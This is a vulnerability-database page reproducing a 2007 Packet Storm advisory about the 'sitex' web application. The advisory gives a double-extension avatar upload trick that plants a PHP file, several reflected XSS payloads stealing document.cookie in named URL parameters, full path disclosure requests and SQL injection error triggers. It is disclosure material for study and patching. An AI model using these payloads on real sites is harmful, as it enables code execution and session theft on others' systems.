Lucene search

sitex-multi.txt

🗓️ 28 Feb 2007 00:00:00Reported by laurent gaffieType

packetstorm🔗 packetstormsecurity.com👁 17 Views

Critical risk due to upload vulnerability and various XSS and SQL injection vulnerabilities, leading to full path disclosure and multiple SQL errors

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

`global risk:critical  
  
upload vulnerability:  
in user profile upload an avatar with a double extension like :  
file.php.jpg   
once it's done,you gone get an error like:Fatal error: Call to undefined function imagedestroy() in /.  
but the last extension (jpg) will be removed by the script, and stored in :  
/content/avatars   
has ramdom_numberfile.php  
  
xss get :  
/sitex/calendar.php?sxMonth=1&sxYear='"><script>alert(document.cookie)</script>  
/sitex/search.php?search=<script>alert(document.cookie)</script>  
  
xss via mysql error:  
/sitex/redirect.php?linkid='</textarea>'"><script>alert(document.cookie)</script>  
/calendar_events.php?page='"><script>alert(document.cookie)</script>  
  
full path disclosure:  
/sitex/calendar.php?sxMonth[]=1  
/sitex/calendar.php?sxMonth=1&sxYear[]=2007  
/calendar_events.php?page[]=1  
  
multiples errors sql :  
just add a ' on any var ..   
or on any fields ( like in forum,search,...etc )  
  
regards laurent gaffié  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

28 Feb 2007 00:00Current

7.4High risk

Vulners AI Score7.4